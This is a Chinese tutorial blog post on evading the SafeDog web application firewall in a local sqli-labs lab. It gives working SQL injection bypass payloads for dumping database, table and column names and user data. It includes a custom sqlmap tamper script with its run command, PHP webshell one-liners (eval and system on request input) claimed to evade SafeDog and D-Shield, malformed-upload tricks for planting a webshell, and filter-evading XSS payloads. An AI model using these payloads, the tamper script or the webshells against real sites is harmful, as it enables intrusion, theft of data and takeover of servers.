这篇文章将为大家详细讲解有关如何编写sqlmap tamper脚本,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
安全狗官网:http://free.safedog.cn/install_desc_website.html
环境:Windows7+phpstudy+sqli-labs+安全狗v4.0
安装的时候最后让填系统服务,cd到phpstudy的apache2/bin
目录,cmd执行:
httpd.exe -k install -n apache
然后服务名填写apache
就行了
去github下载sqli-labs,修改sqli-labs/sql-connections/db-creds.inc
为自己环境的数据库用户名和密码,然后切换phpstudy的php版本为5.2(sqli-labs需要php版本<5.5),修改php.ini:
magic_quotes_gpc = Off
准备工作完成
1.注入判断
下面payload拦截:
-1'||1='1
下面payload不拦截:
-1'||-1='-1 -1'/*!14400or*/1=1%23
=
替换成>
、<
、like
、regexp
同样可以绕过
2.查询字段数
利用换行符+注释绕:
1'/**/order/*/%0a*a*/by/**/3%23
3.联合查询
同样利用换行符+注释绕,因为当union与select同时用的时候它才进行拦截:
-1'union/*/%0a*a*/select/**/1,2,3%23
4.查询所有数据库名:
-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(schema_name)from/**/information_schema.schemata)%23
查询当前数据库的表名时用到了database()
,直接用的话会被拦截,这里用内联注释符将函数特征打乱:
-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=DatabaSe/*!(*/))%23
查询users
表的字段名:
-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users')%23
查数据:
-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(username)from/**/users)%23
直接使用sqlmap,它可以识别出安全狗waf、以及可以通过布尔盲注的方法跑数据(需要--random-agent
参数):
使用sqlmap的--list-tampers
选项查看sqlmap自带的tamper脚本:
这些tamper脚本位于sqlmap-master/tamper/
下,以lowercase.py
为例,分析tamper脚本如何编写:
#!/usr/bin/env python """ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re # 用于正则匹配 from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL # 定义优先级,此处是‘一般’ def dependencies(): pass def tamper(payload, **kwargs): # 定义tamper脚本 # tamper说明 """ Replaces each keyword character with lower case value (e.g. SELECT -> select) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions >>> tamper('INSERT') 'insert' """ retVal = payload # 将基本payload赋值给retVal,做中间转换 if payload: for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): # 查找字母 word = match.group() # 将查找到的值赋值给word if word.upper() in kb.keywords: # 查找到的值是关键字 retVal = retVal.replace(word, word.lower()) # 将关键字全部替换为小写 return retVal # 返回替换后的值
那么复制上面的一份,改名为safedog.py
,更改tamper()
函数,自己编写进行关键字的替换:
#!/usr/bin/env python """ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def tamper(payload, **kwargs): retVal = payload if payload: retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/') retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)') retVal = retVal.replace('USER()', 'usEr/*!(*/)') retVal = retVal.replace(' ', '/**/') retVal = retVal.replace('OR', '/*!14400Or*/') retVal = retVal.replace('AND', '/*!14400aNd*/') return retVal
再次测试:
./sqlmap.py -u 'http://10.211.55.5/sqli-labs/Less-1/?id=1' --flush-session --tamper=safedog --random-agent
这下便可以用sqlmap进行UNION注入了
普通一句话直接被拦截:
随便一个过D盾的马:
<?php $b = &$a; $a = $_POST[1]; $c = &$b; eval(`/**test**/`.$c); ?>
直接进行命令执行,也是能过狗的:
<?php System(/**/"$_GET[1]"); ?>
首先准备一个文件上传demo
upload.html:
<!doctype html> <html lang="en"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title> </head> <body> <form action="./upload.php" enctype="multipart/form-data" multiple="" method="POST" >< input type="file" name="img[]" multiple><button>提交</button> </form> </body> </html>
upload.php:
<?php echo '<pre>'; $img = $_FILES['img']; if(!empty($img)) { $img_desc = reArrayFiles($img); #print_r($img_desc); foreach($img_desc as $val) { $newname = date('YmdHis',time()).mt_rand().'.'.$img["name"][0]; move_uploaded_file($val['tmp_name'],'C:\phpstudy_pro\WWW\upload\\'.$newname); echo $newname; } } function reArrayFiles($file) { $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary; } ?>
直接上传一个webshell,发现被拦截:
测试发现只对后缀名进行了检测;使用burp fuzz可用后缀:
由于是windows环境,服务器并不能将这些可用后缀当做php解析
绕过方法
主要利用畸形request包请求,apache处理request包的时候有容错,从而造成判断差异
1.通过filename处换行绕过:
2.filename用多=
3.用两个filename,第一个filename用=;
4.文件名处填充垃圾字符(大约8k),这种情况需要后端更改上传的文件名,不然文件名太长move_uploaded_file
会移动失败
5.利用.htaccess、.user.ini
以最简单的反射型xss为例,a.php写入:
<?php echo $_GET[1]; ?>
fuzz了一下,下面这些会触发waf:
<script> 标签 <img 标签中含有 src= <iframe 标签中含有 src="javascript:
直接用svg标签:
<svg/onload=alert(1)>
使用带on
属性的标签,鼠标滑过时触发:
<h2 onmousemove="alert(1)">a</h2>
关于“如何编写sqlmap tamper脚本”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。